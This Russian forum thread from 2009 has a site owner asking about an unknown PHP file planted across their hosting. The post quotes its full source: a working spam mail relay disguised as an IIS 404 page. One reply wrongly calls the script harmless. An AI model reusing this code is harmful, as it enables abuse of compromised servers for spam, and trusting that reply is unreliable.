Перейти к содержимому

Сервис обмена электронных валют


Что это такое d3er56son2g.php

#1 Bender

Bender
  • Пользователь
  • 712 сообщений
  • Репутация: 0
0

Отправлено 04 Июнь 2009 - 09:18

Во всех public_html моего хостинга появился файл d3er56son2g.php с таким содержанием:
<?


function XdtdYAoi($xctmp, $from, $to, $subj, $text, $filename) {
	$f		 = fopen($filename,"rb");
	$un		= strtoupper(uniqid(time()));
	$head	  = "From: $from\n";
	$head	 .= "To: $to\n";
	$head	 .= "Reply-To: $from\n";
	$head	 .= "Subject: $subj\n";
	$head	 .= "Content-Type:multipart/mixed;";
	$head	 .= "boundary=\"----------".$un."\"\n\n";
	$zag	   = "------------".$un."\nContent-Type:text/html;\n";
	$zag	  .= "Content-Transfer-Encoding: 8bit\n\n$text\n\n";
	$zag	  .= "------------".$un."\n";
	$zag	  .= "Content-Type: application/octet-stream;";
	$zag	  .= "name=\"".basename($filename)."\"\n";
	$zag	  .= "Content-Transfer-Encoding:base64\n";
	$zag	  .= "Content-Disposition:attachment;";
	$zag	  .= "filename=\"".basename($filename)."\"\n\n";
	$zag	  .= chunk_split(base64_encode(fread($f,filesize($filename))))."\n";

	return @mail("$to", "$subj", $zag, $head);
}

function BJerCRmc($xctmp,$from,$to,$subj,$text) {
	$head	  = "From: $from\n";
	$head	 .= "To: $to\n";	 
	$head	 .= "Subject: $subj\n";
	$head	 .= "Reply-To: $from\n";
	$head	 .= "Content-type: text/html; charset=windows-1251" . "\r\n";
	return @mail($to,$subj,$text,$head);
}

if (!empty($_POST['caption']) && !empty($_POST['email']) && !empty($_POST['clientname']) && !empty($_POST['emailsend']) && !empty($_POST['message']) && ($_POST['index'] == 'send'))
{

  $xclient = substr(htmlspecialchars(trim($_POST['clientname'])), 0, 80);
  $title = substr(htmlspecialchars(trim($_POST['caption'])), 0, 80);
  $mess64 = base64_decode($_POST['message']);
  $mess =  substr(trim($mess64), 0, 10000000);
  $send_to = $_POST['emailsend'];	
  $from = $_POST['email'];
  
  if($_FILES['file']['name'] !=''){
	if (is_dir("tmp")) { } else { mkdir("tmp"); }
	if(is_uploaded_file($_FILES['file']['tmp_name']))   {
	if(move_uploaded_file($_FILES['file']['tmp_name'], "tmp/".basename($_FILES['file']['name']))) {
	if(XdtdYAoi($xclient,$from,$send_to,$title,$mess,"tmp/".basename($_FILES['file']['name']))!== FALSE) { echo "OK-FILE"; } else { echo "ERROR-FILE"; }
	@unlink("tmp/".basename($_FILES['file']['name']));
	} else { echo "ERROR-UPLOAD"; }
	} else { echo "ERROR-MOVE"; }
  } else {
			 if(BJerCRmc($xclient,$from,$send_to,$title,$mess) !== FALSE) {
		   echo "OK-MESS"; } else { echo "ERROR-MESS"; }
	   }
}
else
{
if ($_GET['index'] == 'test') {echo "OK2009"; exit;} else
{
echo '<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<HTML><HEAD><TITLE>The page cannot be found</TITLE>
<META HTTP-EQUIV="Content-Type" Content="text/html; charset=Windows-1252">
<STYLE type="text/css">
  BODY { font: 8pt/12pt verdana }
  H1 { font: 13pt/15pt verdana }
  H2 { font: 8pt/12pt verdana }
  A:link { color: red }
  A:visited { color: maroon }
</STYLE>
</HEAD><BODY><TABLE width=500 border=0 cellspacing=10><TR><TD>

<h1>The page cannot be found</h1>
The page you are looking for might have been removed, had its name changed, or is temporarily unavailable.
<hr>
<p>Please try the following:</p>
<ul>
<li>Make sure that the Web site address displayed in the address bar of your browser is spelled and formatted correctly.</li>
<li>If you reached this page by clicking a link, contact
 the Web site administrator to alert them that the link is incorrectly formatted.
</li>
<li>Click the <a href="java script:history.back(1)">Back</a> button to try another link.</li>
</ul>
<h2>HTTP Error 404 - File or directory not found.<br>Internet Information Services (IIS)</h2>
<hr>
<p>Technical Information (for support personnel)</p>
<ul>
<li>Go to <a href="http://go.microsoft.com/fwlink/?linkid=8180">Microsoft Product Support Services</a> and perform a title search for the words <b>HTTP</b> and <b>404</b>.</li>
<li>Open <b>IIS Help</b>, which is accessible in IIS Manager (inetmgr),
 and search for topics titled <b>Web Site Setup</b>, <b>Common Administrative Tasks</b>, and <b>About Custom Error Messages</b>.</li>
</ul>

</TD></TR></TABLE></BODY></HTML>';}

}  
  
?>
Кто-нибудь может хоть примерно сказать что это такое, я заметил что с его появлением на одном сайте что-то испортилось, что именно - не смог понять, а на другом сайте пропал хтацесс.

 

 

  • 0

#2 Евгений

Евгений
  • Пользователь
  • 481 сообщений
  • Репутация: 0

Отправлено 04 Июнь 2009 - 10:00

а почему бы не спросить у хостера?
  • 0

#3 Bender

Bender
    Topic Starter
  • Пользователь
  • 712 сообщений
  • Репутация: 0

Отправлено 04 Июнь 2009 - 12:09

У меня хостер с "не очень отзывчивой тех поддержкой". Я бы сказал точнее, но материться на форуме вроде как нельзя...

Скажите хоть примерно, что там за функции? Я в пхп полный ноль
  • 0

#4 Евгений

Евгений
  • Пользователь
  • 481 сообщений
  • Репутация: 0

Отправлено 04 Июнь 2009 - 13:14

где то есть форма, там поля примерно такие:

Тема письма
Ваш e-mail (т.е. куда отправляется письмо)
Сообщение
Прикрепленый файл

А этот код обработчик этой формы. Т.е. он отправляет данные на почту тому кто заполнил форму.
Ничего такого вредоносного я в этом скрипте не заметил.

Хотя странно как то нафига он нужен...
  • 0

#5 ZiTosS

ZiTosS
  • Пользователь
  • 5 148 сообщений
  • Репутация: 8

Отправлено 04 Июнь 2009 - 21:13

Bender, мне кажется хостер что-то проверяет, только зачем? Такое чувство хотят проверить отправку формы.
Вот что мне только не нравится
if(move_uploaded_file($_FILES['file']['tmp_name'], "tmp/".basename($_FILES['file']['name']))) {
	if(XdtdYAoi($xclient,$from,$send_to,$title,$mess,"tmp/".basename($_FILES['file']['name']))!== FALSE) { echo "OK-FILE"; } else { echo "ERROR-FILE"; }
	@unlink("tmp/".basename($_FILES['file']['name']));
Происходит загрузка документа в каталог tmp, а затем его стирают, но может быть такое, что закинут, а прав на удаление не будет. Вообще можно удалённо через этот скрипт сдать через вас почту. Зачем они это сделали не знаю.
  • 0


Оформление форума – IPBSkins.ru